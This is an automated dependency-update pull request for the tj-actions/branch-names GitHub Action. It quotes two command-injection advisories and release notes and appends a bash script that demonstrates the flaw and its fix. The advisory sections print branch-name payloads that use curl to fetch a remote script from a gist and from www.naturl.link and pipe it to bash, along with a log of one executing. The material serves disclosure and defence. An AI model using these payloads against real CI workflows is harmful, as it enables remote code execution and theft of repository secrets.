
chore(deps): update tj-actions/branch-names action to v9 [security]#20

Open
renovate[bot] wants to merge 1 commit into master from renovate/github-tags-tj-actions-branch-names-vulnerability/VF-000

Conversation


@renovate renovate bot commented Mar 1, 2026

This PR contains the following updates:

Package                  Type    Update  Change
tj-actions/branch-names  action  major   v6 -> v9

GitHub Vulnerability Alerts

CVE-2023-49291

Summary

The tj-actions/branch-names GitHub Action references the github.event.pull_request.head.ref and github.head_ref context variables within a GitHub Actions run step. The head ref variable is the branch name and can be used to execute arbitrary code using a specially crafted branch name.

Details

The vulnerable code is within the action.yml file: the run step references the value directly, instead of a sanitized variable.

runs:
  using: "composite"
  steps:
    - id: branch
      run: |
        # "Set branch names..."
        if [[ "${{ github.ref }}" != "refs/tags/"* ]]; then
          BASE_REF=$(printf "%q" "${{ github.event.pull_request.base.ref || github.base_ref }}")
          HEAD_REF=$(printf "%q" "${{ github.event.pull_request.head.ref || github.head_ref }}")
          REF=$(printf "%q" "${{ github.ref }}")

An attacker can use a branch name to inject arbitrary code, for example: Test")${IFS}&&${IFS}{curl,-sSfL,gist.githubusercontent.com/RampagingSloth/72511291630c7f95f0d8ffabb3c80fbf/raw/inject.sh}${IFS}|${IFS}bash&&echo${IFS}$("foo will download and run a script from a Gist. This allows an attacker to inject a payload of arbitrary complexity.

Impact

An attacker can use this vulnerability to steal secrets from or abuse GITHUB_TOKEN permissions.

Reference

CVE-2025-54416

Overview

A critical vulnerability has been identified in the tj-actions/branch-names GitHub Action workflow which allows arbitrary command execution in downstream workflows. This issue arises due to inconsistent input sanitization and unescaped output, enabling malicious actors to exploit specially crafted branch names or tags. While internal sanitization mechanisms have been implemented, the action outputs remain vulnerable, exposing consuming workflows to significant security risks.

Technical Details

The vulnerability stems from the unsafe use of the eval printf "%s" pattern within the action's codebase. Although initial sanitization using printf "%q" properly escapes untrusted input, subsequent unescaping via eval printf "%s" reintroduces command injection risks. This unsafe pattern is demonstrated in the following code snippet:

echo "base_ref_branch=$(eval printf "%s" "$BASE_REF")" >> "$GITHUB_OUTPUT"
echo "head_ref_branch=$(eval printf "%s" "$HEAD_REF")" >> "$GITHUB_OUTPUT"
echo "ref_branch=$(eval printf "%s" "$REF_BRANCH")" >> "$GITHUB_OUTPUT"

This approach allows attackers to inject arbitrary commands into workflows consuming these outputs, as shown in the Proof-of-Concept (PoC) below.

Proof-of-Concept (PoC)

  1. Create a branch with the name $(curl,-sSfL,www.naturl.link/NNT652}${IFS}|${IFS}bash).
  2. Trigger the vulnerable workflow by opening a pull request into the target repository.
  3. Observe arbitrary code execution in the workflow logs.

Example output:

Running on a pull request branch.
Run echo "Running on pr: $({curl,-sSfL,www.naturl.link/NNT652}${IFS}|${IFS}bash)"
  echo "Running on pr: $({curl,-sSfL,www.naturl.link/NNT652}${IFS}|${IFS}bash)"
  shell: /usr/bin/bash -e {0}
Running on pr: === PoC script executed successfully ===
Runner user: runner

Impact

This vulnerability enables arbitrary command execution in repositories consuming outputs from tj-actions/branch-names. The severity of the impact depends on the permissions granted to the GITHUB_TOKEN and the context of the triggering event. Potential consequences include:

  • Theft of sensitive secrets stored in the repository.
  • Unauthorized write access to the repository.
  • Compromise of the repository's integrity and security.

Mitigation and Resolution

To address this vulnerability, the unsafe eval printf "%s" pattern must be replaced with safer alternatives. Specifically, direct printf calls can achieve the same functionality without unescaping shell-unsafe characters. Below is the recommended fix:

printf "base_ref_branch=%s\n" "$BASE_REF" >> "$GITHUB_OUTPUT"
printf "head_ref_branch=%s\n" "$HEAD_REF" >> "$GITHUB_OUTPUT"
printf "ref_branch=%s\n" "$REF_BRANCH" >> "$GITHUB_OUTPUT"
printf "tag=%s\n" "$TAG" >> "$GITHUB_OUTPUT"

This approach ensures that all outputs remain properly escaped and safe for downstream consumption.

Recommendations

  1. Immediate Action: Developers using the tj-actions/branch-names workflow should update their workflows to the latest major version, v9.

References


Release Notes

tj-actions/branch-names (tj-actions/branch-names)

v9

Compare Source

🔄 Update

  • Update update-readme.yml (5250492) - (Tonye Jack)
  • Update update-readme.yml (a2bc495) - (Tonye Jack)
  • Update README.md (169ddc1) - (Tonye Jack)
  • Update README.md (4d35052) - (Tonye Jack)
  • Updated README.md (#​423)

Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@​users.noreply.github.com> (6be34a8) - (github-actions[bot])

⬆️ Upgrades

  • Upgraded from v9.0.0 -> v9.0.1 (#​424)

Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@​users.noreply.github.com> (c0714e7) - (github-actions[bot])

v8

Compare Source

🔄 Update

Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@​users.noreply.github.com> (f904073) - (github-actions[bot])

⚙️ Miscellaneous Tasks

🛡️ Security

⬆️ Upgrades

  • Upgraded from v8.2.0 -> v8.2.1 (#​417)

Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@​users.noreply.github.com> (46ae71d) - (github-actions[bot])

v7

Compare Source

📦 Bumps

  • Bump peter-evans/create-pull-request from 5 to 6

Bumps peter-evans/create-pull-request from 5 to 6.


updated-dependencies:

  • dependency-name: peter-evans/create-pull-request
    dependency-type: direct:production
    update-type: version-update:semver-major
    ...

Signed-off-by: dependabot[bot] support@github.com (d7e1c12) - (dependabot[bot])

🔄 Update

  • Updated README.md (331c645) - (jackton1)
  • Update README.md (1dd881b) - (Tonye Jack)
  • Update README.md (df61b49) - (Tonye Jack)

📝 Other

  • PR #​282: update test.yml (6871f53) - (repo-ranger[bot])
  • PR #​281: update tj-actions/verify-changed-files action to v18 (b08a65c) - (repo-ranger[bot])
  • PR #​279: peter-evans/create-pull-request from 5 to 6 (daaa308) - (repo-ranger[bot])
  • PR #​278: README.md (e6d7f60) - (repo-ranger[bot])
  • PR #​277: update tj-actions/verify-changed-files action to v17 (6a42993) - (repo-ranger[bot])
  • PR #​276: update github/codeql-action action to v3 (3480893) - (repo-ranger[bot])
  • PR #​275: to v8 (ce11ce0) - (repo-ranger[bot])

⚙️ Miscellaneous Tasks

  • Update test.yml (fd631fd) - (Tonye Jack)
  • deps: Update tj-actions/verify-changed-files action to v18 (7a67835) - (renovate[bot])
  • deps: Update tj-actions/verify-changed-files action to v17 (2fc8b99) - (renovate[bot])
  • deps: Update github/codeql-action action to v3 (133b286) - (renovate[bot])

⬆️ Upgrades

  • Upgraded from v7.0.7 -> v8 (cf62a9f) - (jackton1)

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


This PR was generated by Mend Renovate. View the repository job log.
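The two emission patterns the advisories above contrast (the `eval printf "%s"` unescape versus a direct `printf` of the `%q`-escaped value), replayed side by side with the two ways a consuming workflow can read the resulting output. This is an added shell example, not code from tj-actions/branch-names or from this PR. The branch name, the `emit_*` and `consume_*` function names and the `ref_is_plain` allowlist are constructed for the example; the embedded command only echoes a marker so that whether it ran is visible.

```bash
#!/usr/bin/env bash
# Added example; not code from tj-actions/branch-names or from this PR. It replays the
# two emission patterns the advisories contrast and the two ways a consuming workflow
# can read the output, on a constructed branch name.

# Constructed branch name standing in for an attacker-controlled head ref. Its only
# embedded command echoes a marker, so whether it ran is visible in the output.
SAMPLE_BRANCH='feature/$(echo INJECTED)'

# `printf %q` as the action uses it (run through bash explicitly so the script also
# behaves the same when invoked by a POSIX sh).
q_escape() {
  bash -c 'printf "%q" "$1"' _ "$1"
}

# Vulnerable emission (CVE-2025-54416): escape, then undo the escaping with
# `eval printf "%s"`, so the GITHUB_OUTPUT line carries the raw branch name.
emit_vulnerable() {
  printf 'head_ref_branch=%s\n' "$(eval printf "%s" "$(q_escape "$1")")"
}

# Fixed emission: the escaped value is written as-is.
emit_fixed() {
  printf 'head_ref_branch=%s\n' "$(q_escape "$1")"
}

# Value part of a `name=value` GITHUB_OUTPUT line.
output_value() {
  printf '%s' "${1#*=}"
}

# Consumer that interpolates the output into the script text, which is what
#   run: echo "Running on pr: ${{ steps.branch.outputs.head_ref_branch }}"
# does: the runner substitutes the text before bash ever parses it.
consume_interpolated() {
  bash -c "echo \"Running on pr: $1\""
}

# Consumer that passes the output through an environment variable, which is what
#   env:
#     HEAD_REF_BRANCH: ${{ steps.branch.outputs.head_ref_branch }}
#   run: echo "Running on pr: $HEAD_REF_BRANCH"
# does: bash expands the value as data and never parses it as code.
consume_env() {
  HEAD_REF_BRANCH="$1" bash -c 'echo "Running on pr: $HEAD_REF_BRANCH"'
}

# Defender-side check: refs outside a conservative character set deserve a look
# before they are fed to any shell step. Returns 0 when the ref is plain.
ref_is_plain() {
  case "$1" in
    *[!A-Za-z0-9._/-]*) return 1 ;;
    *) return 0 ;;
  esac
}

# Walk-through when run directly.
raw=$(output_value "$(emit_vulnerable "$SAMPLE_BRANCH")")
escaped=$(output_value "$(emit_fixed "$SAMPLE_BRANCH")")
echo "raw output value:         $raw"
echo "escaped output value:     $escaped"
echo "raw + \${{ }} in run:      $(consume_interpolated "$raw")"      # marker command runs
echo "escaped + \${{ }} in run:  $(consume_interpolated "$escaped")"  # stays literal
echo "raw + env:                $(consume_env "$raw")"                # literal even when raw
ref_is_plain "$SAMPLE_BRANCH" || echo "branch name contains shell metacharacters"
```

Two things worth noticing when running it: with the raw output interpolated into `run:`, the embedded command executes (the PoC in the advisory above is the same mechanism with a real payload), whereas the `env:` route prints the branch name unchanged even when the action emits it raw. The `printf` fix closes the action side, but the escaped value it emits is still a shell-escaped string when it arrives downstream, so the consumer-side `env:` pattern from GitHub's security hardening guidance is the one that does not depend on the upstream action getting escaping right.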

@renovate renovate bot added dependencies Pull requests that update a dependency file ready for review labels Mar 1, 2026
@renovate renovate bot requested a review from effervescentia March 1, 2026 06:44
sonarqubecloud bot commented Mar 1, 2026
